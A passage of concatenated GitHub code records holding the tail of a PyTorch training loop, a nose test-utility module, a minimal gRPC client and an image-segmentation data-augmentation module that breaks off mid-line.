training_utils.train_epoch(loaders[\"train\"], model, criterion, optimizer, fbgd=fbgd,\n save_freq_int=save_freq_int, epoch = epoch,\n output_dir=output_dir, fix_elr = fix_elr, fix_all_elr = fix_all_elr,\n si_pnorm_0=si_pnorm_0, model_name = model_name)\n if (\n epoch == 1\n or epoch % eval_freq == eval_freq - 1\n or epoch == end_epoch - 1\n ):\n test_res = training_utils.eval(loaders[\"test\"], model, criterion)\n else:\n test_res = {\"loss\": None, \"accuracy\": None}\n \n def save_epoch(epoch):\n training_utils.save_checkpoint(\n output_dir,\n epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict(),\n train_res=train_res,\n test_res=test_res\n )\n\n if save_freq is None:\n if training_utils.do_report(epoch):\n save_epoch(epoch)\n elif epoch % save_freq == 0:\n save_epoch(epoch)\n \n time_ep = time.time() - time_ep\n values = [\n epoch,\n lr,\n train_res[\"loss\"],\n train_res[\"accuracy\"],\n test_res[\"loss\"],\n test_res[\"accuracy\"],\n time_ep,\n ]\n table = tabulate.tabulate([values], columns, tablefmt=\"simple\", floatfmt=\"8.4f\")\n if epoch % 40 == 1:\n table = table.split(\"\\n\")\n table = \"\\n\".join([table[1]] + table)\n else:\n table = table.split(\"\\n\")[2]\n print(table)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tipt0p/three_regimes_on_the_sphere","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"22865843610","text":"\"\"\"Utility functions and classes 
used by nose internally.\n\"\"\"\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\nimport types\nimport unittest\nfrom compiler.consts import CO_GENERATOR\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom nose.config import Config\n\nlog = logging.getLogger('nose')\n\ndef absdir(path):\n \"\"\"Return absolute, normalized path to directory, if it exists; None\n otherwise.\n \"\"\"\n if not os.path.isabs(path):\n path = os.path.normpath(os.path.abspath(os.path.join(os.getcwd(),\n path)))\n if path is None or not os.path.isdir(path):\n return None\n return path\n\n\ndef absfile(path, where=None):\n \"\"\"Return absolute, normalized path to file (optionally in directory\n where), or None if the file can't be found either in where or the current\n working directory.\n \"\"\"\n orig = path\n if where is None:\n where = os.getcwd()\n if isinstance(where, list) or isinstance(where, tuple):\n for maybe_path in where:\n maybe_abs = absfile(path, maybe_path)\n if maybe_abs is not None:\n return maybe_abs\n return None\n if not os.path.isabs(path):\n path = os.path.normpath(os.path.abspath(os.path.join(where, path)))\n if path is None or not os.path.exists(path):\n if where != os.getcwd():\n # try the cwd instead\n path = os.path.normpath(os.path.abspath(os.path.join(os.getcwd(),\n orig)))\n if path is None or not os.path.exists(path):\n return None\n if os.path.isdir(path):\n # might want an __init__.py from package\n init = os.path.join(path,'__init__.py')\n if os.path.isfile(init):\n return init\n elif os.path.isfile(path):\n return path\n return None\n\n\ndef anyp(predicate, iterable):\n for item in iterable:\n if predicate(item):\n return True\n return False\n\n\ndef file_like(name):\n return os.path.dirname(name) or name.endswith('.py')\n\n\ndef func_lineno(func):\n \"\"\"Get the line number of a function. First looks for\n compat_co_firstlineno, then func_code.co_firstlineno.\n \"\"\"\n try:\n return func.compat_co_firstlineno\n except AttributeError:\n return func.func_code.co_firstlineno\n\n\ndef is_generator(func):\n try:\n return func.func_code.co_flags & CO_GENERATOR != 0\n except AttributeError:\n return False\n\n \ndef split_test_name(test):\n \"\"\"Split a test name into a 3-tuple containing file, module, and callable\n names, any of which (but not all) may be blank.\n\n Test names are in the form:\n\n file_or_module:callable\n\n Either side of the : may be dotted. 
To change the splitting behavior, you\n can alter nose.util.split_test_re.\n \"\"\"\n parts = test.split(':')\n num = len(parts)\n if num == 1:\n # only a file or mod part\n if file_like(test):\n return (test, None, None)\n else:\n return (None, test, None)\n elif num >= 3:\n # definitely popped off a windows driveletter\n file_or_mod = ':'.join(parts[0:-1])\n fn = parts[-1]\n else:\n # only a file or mod part, or a test part, or\n # we mistakenly split off a windows driveletter\n file_or_mod, fn = parts\n if len(file_or_mod) == 1:\n # windows drive letter: must be a file\n if not file_like(fn):\n raise ValueError(\"Test name '%s' is ambiguous; can't tell \"\n \"if ':%s' refers to a module or callable\"\n % (test, fn))\n return (test, None, None) \n if file_or_mod:\n if file_like(file_or_mod):\n return (file_or_mod, None, fn)\n else:\n return (None, file_or_mod, fn)\n else:\n return (None, None, fn)\n\n \ndef test_address(test):\n \"\"\"Find the test address for a test, which may be a module, filename,\n class, method or function.\n \"\"\"\n # type-based polymorphism sucks in general, but I believe is\n # appropriate here\n t = type(test)\n if t == types.ModuleType:\n return (os.path.abspath(test.__file__), test.__name__)\n if t == types.FunctionType:\n m = sys.modules[test.__module__]\n return (os.path.abspath(m.__file__), test.__module__, test.__name__)\n if t in (type, types.ClassType):\n m = sys.modules[test.__module__]\n return (os.path.abspath(m.__file__), test.__module__, test.__name__)\n if t == types.InstanceType:\n return test_address(test.__class__)\n if t == types.MethodType:\n cls_adr = test_address(test.im_class)\n return (cls_adr[0], cls_adr[1],\n \"%s.%s\" % (cls_adr[2], test.__name__))\n # handle unittest.TestCase instances\n if isinstance(test, unittest.TestCase):\n if hasattr(test, 'testFunc'):\n # nose FunctionTestCase\n return test_address(test.testFunc)\n if hasattr(test, '_FunctionTestCase__testFunc'):\n # unittest FunctionTestCase\n return test_address(test._FunctionTestCase__testFunc)\n if hasattr(test, 'testCase'):\n # nose MethodTestCase\n return test_address(test.testCase)\n # regular unittest.TestCase\n cls_adr = test_address(test.__class__)\n # 2.5 compat: __testMethodName changed to _testMethodName\n try:\n method_name = test._TestCase__testMethodName\n except AttributeError:\n method_name = test._testMethodName\n return (cls_adr[0], cls_adr[1],\n \"%s.%s\" % (cls_adr[2], method_name))\n raise TypeError(\"I don't know what %s is (%s)\" % (test, t))\n\n\ndef try_run(obj, names):\n \"\"\"Given a list of possible method names, try to run them with the\n provided object. Keep going until something works. Used to run\n setup/teardown methods for module, package, and function tests.\n \"\"\"\n for name in names:\n func = getattr(obj, name, None)\n if func is not None:\n if type(obj) == types.ModuleType:\n # py.test compatibility\n try:\n args, varargs, varkw, defaults = inspect.getargspec(func)\n except TypeError:\n # Not a function. If it's callable, call it anyway\n if hasattr(func, '__call__'):\n func = func.__call__\n try:\n args, varargs, varkw, defaults = \\\n inspect.getargspec(func)\n args.pop(0) # pop the self off\n except TypeError:\n raise TypeError(\"Attribute %s of %r is not a python \"\n \"function. 
Only functions or callables\"\n \" may be used as fixtures.\" %\n (name, obj)) \n if len(args):\n log.debug(\"call fixture %s.%s(%s)\", obj, name, obj) \n return func(obj)\n log.debug(\"call fixture %s.%s\", obj, name)\n return func()\n\n \ndef tolist(val):\n \"\"\"Convert a value that may be a list or a (possibly comma-separated)\n string into a list. The exception: None is returned as None, not [None].\n \"\"\"\n if val is None:\n return None\n try:\n # might already be a list\n val.extend([])\n return val\n except AttributeError:\n pass\n # might be a string\n try:\n return re.split(r'\\s*,\\s*', val)\n except TypeError:\n # who knows... \n return list(val)\n","repo_name":"thraxil/gtreed","sub_path":"working-env/lib/python2.5/nose-0.9.3-py2.5.egg/nose/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42561396678","text":"import grpc\nimport hello_pb2\nimport hello_pb2_grpc\n\n\ndef run_client():\n with grpc.insecure_channel('localhost:50051') as channel:\n stub = hello_pb2_grpc.BasicServiceStub(channel)\n try:\n response = stub.BasicFunction(hello_pb2.BasicRequest(request=\"grpc!\"))\n except grpc.RpcError as e:\n print(e.code())\n print(e.details())\n\n\nif __name__ == '__main__':\n run_client()\n","repo_name":"Rahonam/grpc","sub_path":"python-error/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12391123486","text":"import math\nimport numbers\nimport random\nimport numpy as np\nimport torchvision.transforms.functional as tf\nimport cv2\nfrom scipy.ndimage.interpolation import map_coordinates\nfrom scipy.ndimage.filters import gaussian_filter\nfrom PIL import Image, ImageOps\nimport collections\nfrom matplotlib import pyplot as plt\n\n\nclass Compose(object):\n def __init__(self, augmentations):\n self.augmentations = augmentations\n self.PIL = True\n\n def __call__(self, img, mask):\n if isinstance(img, np.ndarray):\n self.PIL = False\n\n if self.PIL:\n img = np.array(img)\n mask = np.array(mask)\n\n assert img.shape[:2] == mask.shape[:2]\n\n for a in self.augmentations:\n img, mask = a(img, mask)\n\n return img, mask\n\n\nclass RandomCrop(object):\n def __init__(self, size, padding=0):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.padding = padding\n\n def __call__(self, img, mask):\n if self.padding > 0:\n img = ImageOps.expand(img, border=self.padding, fill=0)\n mask = ImageOps.expand(mask, border=self.padding, fill=0)\n\n # assert img.size == mask.size\n w, h = img.size\n th, tw = self.size\n if w == tw and h == th:\n return img, mask\n if w < tw or h < th:\n return img.resize((tw, th), Image.BILINEAR), mask.resize((tw, th), Image.NEAREST)\n\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n return img.crop((x1, y1, x1 + tw, y1 + th)), mask.crop((x1, y1, x1 + tw, y1 + th))\n\n\nclass AdjustGamma(object):\n def __init__(self, gamma):\n self.gamma = gamma\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_gamma(img, random.uniform(1, 1 + self.gamma)), mask\n\n\nclass AdjustSaturation(object):\n def __init__(self, saturation):\n self.saturation = saturation\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return (\n tf.adjust_saturation(img, random.uniform(1 - self.saturation, 1 + 
self.saturation)),\n mask,\n )\n\n\nclass AdjustHue(object):\n def __init__(self, hue):\n self.hue = hue\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_hue(img, random.uniform(-self.hue, self.hue)), mask\n\n\nclass AdjustBrightness(object):\n def __init__(self, bf):\n self.bf = bf\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_brightness(img, random.uniform(1 - self.bf, 1 + self.bf)), mask\n\n\nclass AdjustContrast(object):\n def __init__(self, cf):\n self.cf = cf\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_contrast(img, random.uniform(1 - self.cf, 1 + self.cf)), mask\n\n\nclass CenterCrop(object):\n def __init__(self, size, padding=0):\n self.padding = padding\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n if self.padding > 0:\n img = ImageOps.expand(img, border=self.padding, fill=0)\n mask = ImageOps.expand(mask, border=self.padding, fill=0)\n\n w, h = img.size\n th, tw = self.size\n\n if w == tw and h == th:\n return img, mask\n if w < tw or h < th:\n return (img.resize((tw, th), Image.BILINEAR), mask.resize((tw, th), Image.NEAREST))\n\n x1 = int(round((w - tw) / 2.0))\n y1 = int(round((h - th) / 2.0))\n return (img.crop((x1, y1, x1 + tw, y1 + th)), mask.crop((x1, y1, x1 + tw, y1 + th)))\n\n'''\nclass RandomHorizontallyFlip(object):\n def __init__(self, p):\n self.p = p\n\n def __call__(self, img, mask, contour):\n if random.random() < self.p:\n return (img.transpose(Image.FLIP_LEFT_RIGHT), mask.transpose(Image.FLIP_LEFT_RIGHT), contour.transpose(Image.FLIP_LEFT_RIGHT))\n return img, mask, contour\n\n\nclass RandomVerticallyFlip(object):\n def __init__(self, p):\n self.p = p\n\n def __call__(self, img, mask):\n if random.random() < self.p:\n return (img.transpose(Image.FLIP_TOP_BOTTOM), mask.transpose(Image.FLIP_TOP_BOTTOM))\n return img, mask\n'''\n\n\nclass RandomHorizontalFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, image, label):\n if random.random() < self.p:\n image = cv2.flip(image, 1)\n label = cv2.flip(label, 1)\n return image, label\n\n\nclass RandomVerticalFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, image, label):\n if random.random() < self.p:\n image = cv2.flip(image, 0)\n label = cv2.flip(label, 0)\n return image, label\n\n\n\n\nclass FreeScale(object):\n def __init__(self, size):\n self.size = tuple(reversed(size)) # size: (h, w)\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return (img.resize(self.size, Image.BILINEAR), mask.resize(self.size, Image.NEAREST))\n\n\nclass RandomTranslate(object):\n def __init__(self, offset):\n # tuple (delta_x, delta_y)\n self.offset = offset\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n x_offset = int(2 * (random.random() - 0.5) * self.offset[0])\n y_offset = int(2 * (random.random() - 0.5) * self.offset[1])\n\n x_crop_offset = x_offset\n y_crop_offset = y_offset\n if x_offset < 0:\n x_crop_offset = 0\n if y_offset < 0:\n y_crop_offset = 0\n\n cropped_img = tf.crop(\n img,\n y_crop_offset,\n x_crop_offset,\n img.size[1] - abs(y_offset),\n img.size[0] - abs(x_offset),\n )\n\n if x_offset >= 0 and y_offset >= 0:\n padding_tuple = (0, 0, x_offset, y_offset)\n\n elif x_offset >= 0 and y_offset < 0:\n padding_tuple = (0, abs(y_offset), x_offset, 0)\n\n elif x_offset < 0 and y_offset >= 0:\n 
padding_tuple = (abs(x_offset), 0, 0, y_offset)\n\n elif x_offset < 0 and y_offset < 0:\n padding_tuple = (abs(x_offset), abs(y_offset), 0, 0)\n\n return (\n tf.pad(cropped_img, padding_tuple, padding_mode=\"reflect\"),\n tf.affine(\n mask,\n translate=(-x_offset, -y_offset),\n scale=1.0,\n angle=0.0,\n shear=0.0,\n fillcolor=250,\n ),\n )\n\n\nclass RandomRotate(object):\n def __init__(self, degree):\n self.degree = degree\n\n def __call__(self, img, mask):\n rotate_degree = random.random() * 2 * self.degree - self.degree\n return (\n tf.affine(\n img,\n translate=(0, 0),\n scale=1.0,\n angle=rotate_degree,\n resample=Image.BILINEAR,\n fillcolor=(0, 0, 0),\n shear=0.0,\n ),\n tf.affine(\n mask,\n translate=(0, 0),\n scale=1.0,\n angle=rotate_degree,\n resample=Image.NEAREST,\n fillcolor=250,\n shear=0.0,\n ),\n )\n\n\nclass Scale(object):\n def __init__(self, size_w, size_h):\n self.size_w = size_w\n self.size_h = size_h\n\n def __call__(self, img, mask):\n assert img.shape[:2] == mask.shape[:2]\n w, h = img.shape[:2]\n if (w >= h and w == self.size_w) or (h >= w and h == self.size_h):\n return img, mask\n if w > h:\n ow = self.size_w\n oh = int(self.size_h * h / w)\n return cv2.resize(img, (ow, oh)), cv2.resize(mask, (ow, oh), cv2.INTER_NEAREST)\n else:\n ow = int(self.size_w * w / h)\n oh = self.size_h\n return cv2.resize(img, (ow, oh)), cv2.resize(mask, (ow, oh), cv2.INTER_NEAREST)\n\n\nclass RandomSizedCrop(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(0.45, 1.0) * area\n aspect_ratio = random.uniform(0.5, 2)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n x1 = random.randint(0, img.size[0] - w)\n y1 = random.randint(0, img.size[1] - h)\n\n img = img.crop((x1, y1, x1 + w, y1 + h))\n mask = mask.crop((x1, y1, x1 + w, y1 + h))\n assert img.size == (w, h)\n\n return (\n img.resize((self.size, self.size), Image.BILINEAR),\n mask.resize((self.size, self.size), Image.NEAREST),\n )\n\n # Fallback\n scale = Scale(self.size)\n crop = CenterCrop(self.size)\n return crop(*scale(img, mask))\n\n\nclass RandomSized(object):\n def __init__(self, size):\n self.size = size\n self.scale = Scale(self.size)\n self.crop = RandomCrop(self.size)\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n\n w = int(random.uniform(0.5, 2) * img.size[0])\n h = int(random.uniform(0.5, 2) * img.size[1])\n\n img, mask = (img.resize((w, h), Image.BILINEAR), mask.resize((w, h), Image.NEAREST))\n\n return self.crop(*self.scale(img, mask))\n\n\nclass RandomGaussianBlur(object):\n def __init__(self, radius=5):\n self.radius = radius\n\n def __call__(self, image, label):\n if random.random() < 0.5:\n image = cv2.GaussianBlur(image, (self.radius, self.radius), 0)\n return image, label\n\n\n\nclass Sliding_Window_Crop(object):\n def __init__(self, size, stride):\n self.size = size\n self.stride = stride\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n\n w, h = mask.size\n\n if w == self.size and h == self.size:\n return [Image.fromarray(img)], [Image.fromarray(mask)]\n if w < self.size or h < self.size:\n img = img.resize((max(w, self.size), max(h, self.size)), Image.BILINEAR)\n mask = mask.resize((max(w, self.size), max(h, self.size)), Image.NEAREST)\n\n # return 
[img.resize((self.size, self.size), Image.BILINEAR)], \\\n # [mask.resize((self.size, self.size), Image.NEAREST)]\n\n img = np.array(img)\n mask = np.array(mask)\n\n # Notice we swap to match PIL image with numpy array shape\n w, h = h, w\n\n step_w = int(np.ceil((w - self.size) / self.stride)) + 1\n step_h = int(np.ceil((h - self.size) / self.stride)) + 1\n\n img_list = []\n mask_list = []\n\n counter = 0\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n if end_x >= w:\n end_x = w\n start_x = end_x - self.size\n if end_y >= h:\n end_y = h\n start_y = end_y - self.size\n\n img_crop = img[start_x:end_x, start_y:end_y, :]\n mask_crop = mask[start_x:end_x, start_y:end_y]\n\n img_list.append(Image.fromarray(img_crop))\n mask_list.append(Image.fromarray(mask_crop))\n\n # img_crop = img.crop((start_x, start_y, end_x, end_y))\n # mask_crop = mask.crop((start_x, start_y, end_x, end_y))\n # img_list.append(img_crop)\n # mask_list.append(mask_crop)\n\n # temp_dir = '/home/xujl/data/results/frrn_debug/'\n # img_temp =Image.fromarray(img_crop)\n # img_temp.save(temp_dir + str(counter) + '.png')\n # counter = counter + 1\n\n\n # print(start_x, end_x, start_y, end_y, img_crop.size)\n return img_list, mask_list\n\n\nclass SW_Merge_Prediction(object):\n def __init__(self, size, stride, original_w, original_h):\n self.size = size\n self.stride = stride\n self.original_w = original_w\n self.original_h = original_h\n\n def __call__(self, mask_list):\n pred = np.array(np.zeros([self.original_w, self.original_h])).astype(np.float64)\n counter = pred + (1 + np.finfo(np.float32).eps)\n\n total = len(mask_list)\n step_w = int(np.ceil((self.original_w - self.size) / self.stride))\n step_h = int(np.ceil((self.original_h - self.size) / self.stride))\n\n idx = 0\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n\n if i == step_w - 1:\n end_x = self.original_w\n start_x = end_x - self.size\n\n if j == step_h - 1:\n end_y = self.original_h\n start_y = end_y - self.size\n\n pred[start_x:end_x, start_y:end_y] += mask_list[idx]\n counter[start_x:end_x, start_y:end_y] += 1\n idx += 1\n\n pred /= counter\n pred = pred[np.newaxis, :, :]\n return pred\n\n\nclass SWA_Merge_Prediction(object):\n def __init__(self, size, stride, original_w, original_h):\n self.size = size\n self.stride = stride\n self.original_w = original_w\n self.original_h = original_h\n self.weight, self.ori_weight = self.get_weight()\n self.gauss = self.get_gauss(window_size=size, sigma=1.5)\n\n def get_gauss(self, window_size, sigma=1.5):\n one_gauss = np.array(\n [np.exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])\n one_gauss /= np.sum(one_gauss)\n\n two_gauss = np.matmul(one_gauss, one_gauss.T)\n return two_gauss\n\n def get_weight(self):\n weight = np.zeros([self.size, self.size])\n for i in range(self.size):\n for j in range(self.size):\n dx = min(i, self.size - i)\n dy = min(j, self.size - j)\n d = min(dx, dy)\n weight[i, j] = d + 1\n\n weight /= weight.max()\n\n ori_weight = np.zeros([self.original_w, self.original_h])\n for i in range(self.original_w):\n for j in range(self.original_h):\n dx = min(i, self.original_w - i)\n dy = min(j, self.original_h - j)\n d = min(dx, dy)\n ori_weight[i, j] = d + 1\n\n ori_weight /= ori_weight.max()\n\n return weight, ori_weight\n\n def 
__call__(self, mask_list):\n ow = max(self.original_w, self.size)\n oh = max(self.original_h, self.size)\n\n pred = np.array(np.zeros([ow, oh])).astype(np.float64)\n counter = pred + 1\n\n total = len(mask_list)\n step_w = int(np.ceil((ow - self.size) / self.stride)) + 1\n step_h = int(np.ceil((oh - self.size) / self.stride)) + 1\n\n # print('step_w, ', step_w, 'step_h ', step_h, 'total: ', total)\n # print('self.size ', self.size, 'self.stride, ', self.stride, 'ow, ', self.original_w, 'oh', self.original_h)\n idx = 0\n\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n\n if end_x >= ow:\n end_x = ow\n start_x = end_x - self.size\n\n if end_y >= oh:\n end_y = oh\n start_y = end_y - self.size\n\n\n # pred[start_x:end_x, start_y:end_y] += mask_list[idx] * self.gauss\n # counter[start_x:end_x, start_y:end_y] += self.gauss\n pred[start_x:end_x, start_y:end_y] += mask_list[idx]\n counter[start_x:end_x, start_y:end_y] += 1\n idx += 1\n\n pred /= counter\n # pred /= self.ori_weight\n pred = pred[0:self.original_w, 0:self.original_h]\n pred = pred[np.newaxis, :, :]\n return pred\n\n\nclass elastic_transform(object):\n def __init__(self):\n pass\n\n def __call__(self, img, mask):\n img = np.array(img)\n mask = np.array(mask)\n\n image = np.concatenate((img, mask[:, :, np.newaxis]), axis=2)\n\n alpha = img.shape[0] * 2\n sigma = img.shape[0] * 0.08\n alpha_affine = img.shape[0] * 0.08\n random_state = None\n\n if random_state is None:\n random_state = np.random.RandomState(None)\n\n shape = image.shape\n shape_size = shape[:2]\n\n # Random affine\n center_square = np.float32(shape_size) // 2\n square_size = min(shape_size) // 3\n pts1 = np.float32(\n [center_square + square_size, [center_square[0] + square_size, center_square[1] - square_size],\n center_square - square_size])\n pts2 = pts1 + random_state.uniform(-alpha_affine, alpha_affine, size=pts1.shape).astype(np.float32)\n M = cv2.getAffineTransform(pts1, pts2)\n\n image = cv2.warpAffine(image, M, shape_size, borderMode=cv2.BORDER_REFLECT_101)\n\n dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma) * alpha\n dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma) * alpha\n dz = np.zeros_like(dx)\n\n x, y, z = np.meshgrid(np.arange(shape[1]), np.arange(shape[0]), np.arange(shape[2]))\n indices = np.reshape(y + dy, (-1, 1)), np.reshape(x + dx, (-1, 1)), np.reshape(z, (-1, 1))\n\n image = map_coordinates(image, indices, order=1, mode='reflect').reshape(shape)\n\n img = image[:, :, :3]\n mask = image[:, :, 3]\n return img, mask\n\n\nclass RandomResizedCrop(object):\n def __init__(self, size, scale=(0.05, 1.5), ratio=(3. / 4., 4. 
/ 3.), interpolation=Image.BILINEAR):\n self.size = (size, size)\n self.interpolation = interpolation\n self.scale = scale\n self.ratio = ratio\n\n\n @staticmethod\n def get_params(img, scale, ratio):\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(*scale) * area\n aspect_ratio = random.uniform(*ratio)\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n if random.random() < 0.5:\n w, h = h, w\n if w <= img.size[0] and h <= img.size[1]:\n i = random.randint(0, img.size[1] - h)\n j = random.randint(0, img.size[0] - w)\n\n w = min(img.size[0], img.size[1])\n i = (img.size[1] - w) // 2\n j = (img.size[0] - w) // 2\n return i, j, h, w\n\n def __call__(self, img, mask):\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n return tf.resized_crop(img, i, j, h, w, self.size, self.interpolation),\\\n tf.resized_crop(mask, i, j, h, w, self.size, self.interpolation),\\\n\n\nclass RandScale(object):\n # Randomly resize image & label with scale factor in [scale_min, scale_max]\n def __init__(self, scale, aspect_ratio=None):\n assert (isinstance(scale, collections.Iterable) and len(scale) == 2)\n if isinstance(scale, collections.Iterable) and len(scale) == 2 \\\n and isinstance(scale[0], numbers.Number) and isinstance(scale[1], numbers.Number) \\\n and 0 < scale[0] < scale[1]:\n self.scale = scale\n else:\n raise (RuntimeError(\"segtransform.RandScale() scale param error.\\n\"))\n if aspect_ratio is None:\n self.aspect_ratio = aspect_ratio\n elif isinstance(aspect_ratio, collections.Iterable) and len(aspect_ratio) == 2 \\\n and isinstance(aspect_ratio[0], numbers.Number) and isinstance(aspect_ratio[1], numbers.Number) \\\n and 0 < aspect_ratio[0] < aspect_ratio[1]:\n self.aspect_ratio = aspect_ratio\n else:\n raise (RuntimeError(\"segtransform.RandScale() aspect_ratio param error.\\n\"))\n\n def __call__(self, image, mask):\n temp_scale = self.scale[0] + (self.scale[1] - self.scale[0]) * random.random()\n temp_aspect_ratio = 1.0\n if self.aspect_ratio is not None:\n temp_aspect_ratio = self.aspect_ratio[0] + (self.aspect_ratio[1] - self.aspect_ratio[0]) * random.random()\n temp_aspect_ratio = math.sqrt(temp_aspect_ratio)\n scale_factor_x = temp_scale * temp_aspect_ratio\n scale_factor_y = temp_scale / temp_aspect_ratio\n image = cv2.resize(image, None, fx=scale_factor_x, fy=scale_factor_y, interpolation=cv2.INTER_LINEAR)\n mask = cv2.resize(mask, None, fx=scale_factor_x, fy=scale_factor_y, interpolation=cv2.INTER_NEAREST)\n return image, mask\n\n\nclass Crop(object):\n \"\"\"Crops the given ndarray image (H*W*C or H*W).\n Args:\n size (sequence or int): Desired output size of the crop. 
If size is an\n int instead of sequence like (h, w), a square crop (size, size) is made.\n \"\"\"\n def __init__(self, size, crop_type='rand', padding=None, ignore_label=255):\n if isinstance(size, int):\n self.crop_h = size\n self.crop_w = size\n elif isinstance(size, collections.Iterable) and len(size) == 2 \\\n and isinstance(size[0], int) and isinstance(size[1], int) \\\n and size[0] > 0 and size[1] > 0:\n self.crop_h = size[0]\n self.crop_w = size[1]\n else:\n raise (RuntimeError(\"crop size error.\\n\"))\n if crop_type == 'center' or crop_type == 'rand':\n self.crop_type = crop_type\n else:\n raise (RuntimeError(\"crop type error: rand | center\\n\"))\n if padding is None:\n self.padding = padding\n elif isinstance(padding, list):\n if all(isinstance(i, numbers.Number) for i in padding):\n self.padding = padding\n else:\n raise (RuntimeError(\"padding in Crop() should be a number list\\n\"))\n if len(padding) != 3:\n raise (RuntimeError(\"padding channel is not equal with 3\\n\"))\n else:\n raise (RuntimeError(\"padding in Crop() should be a number list\\n\"))\n if isinstance(ignore_label, int):\n self.ignore_label = ignore_label\n else:\n raise (RuntimeError(\"ignore_label should be an integer number\\n\"))\n\n def __call__(self, image, label):\n #print(label.shape)\n h, w = label.shape[:2]\n pad_h = max(self.crop_h - h, 0)\n pad_w = max(self.crop_w - w, 0)\n pad_h_half = int(pad_h / 2)\n pad_w_half = int(pad_w / 2)\n if pad_h > 0 or pad_w > 0:\n if self.padding is None:\n raise (RuntimeError(\"segtransform.Crop() need padding while padding argument is None\\n\"))\n image = cv2.copyMakeBorder(image, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=self.padding)\n label = cv2.copyMakeBorder(label, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=self.ignore_label)\n h, w = label.shape[:2]\n if self.crop_type == 'rand':\n h_off = random.randint(0, h - self.crop_h)\n w_off = random.randint(0, w - self.crop_w)\n else:\n h_off = int((h - self.crop_h) / 2)\n w_off = int((w - self.crop_w) / 2)\n image = image[h_off:h_off+self.crop_h, w_off:w_off+self.crop_w]\n label = label[h_off:h_off+self.crop_h, w_off:w_off+self.crop_w]\n return image, label\n\n\nclass Lambda(object):\n \"\"\"Apply a user-defined lambda as a transform.\n\n Args:\n lambd (function): Lambda/function to be used for transform.\n \"\"\"\n\n def __init__(self, lambd):\n # assert isinstance(lambd, types.LambdaType)\n self.lambd = lambd\n\n def __call__(self, img, mask):\n return self.lambd(img), self.lambd(mask)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass ColorJitter(object):\n \"\"\"Randomly change the brightness, contrast and saturation of an image.\n\n Args:\n brightness (float): How much to jitter brightness. brightness_factor\n is chosen uniformly from [max(0, 1 - brightness), 1 + brightness].\n contrast (float): How much to jitter contrast. contrast_factor\n is chosen uniformly from [max(0, 1 - contrast), 1 + contrast].\n saturation (float): How much to jitter saturation. saturation_factor\n is chosen uniformly from [max(0, 1 - saturation), 1 + saturation].\n hue(float): How much to jitter hue. hue_factor is chosen uniformly from\n [-hue, hue]. 
Should be >=0 and <= 0.5.\n \"\"\"\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n self.brightness = brightness\n self.contrast = contrast\n self.saturation = saturation\n self.hue = hue\n\n @staticmethod\n def get_params(brightness, contrast, saturation, hue):\n \"\"\"Get a randomized transform to be applied on image.\n\n Arguments are same as that of __init__.\n\n Returns:\n Transform which randomly adjusts brightness, contrast and\n saturation in a random order.\n \"\"\"\n transforms = []\n if brightness > 0:\n brightness_factor = random.uniform(max(0, 1 - brightness), 1 + brightness)\n transforms.append(Lambda(lambda img: tf.adjust_brightness(img, brightness_factor)))\n\n if contrast > 0:\n contrast_factor = random.uniform(max(0, 1 - contrast), 1 + contrast)\n transforms.append(Lambda(lambda img: tf.adjust_contrast(img, contrast_factor)))\n\n if saturation > 0:\n saturation_factor = random.uniform(max(0, 1 - saturation), 1 + saturation)\n transforms.append(Lambda(lambda img: 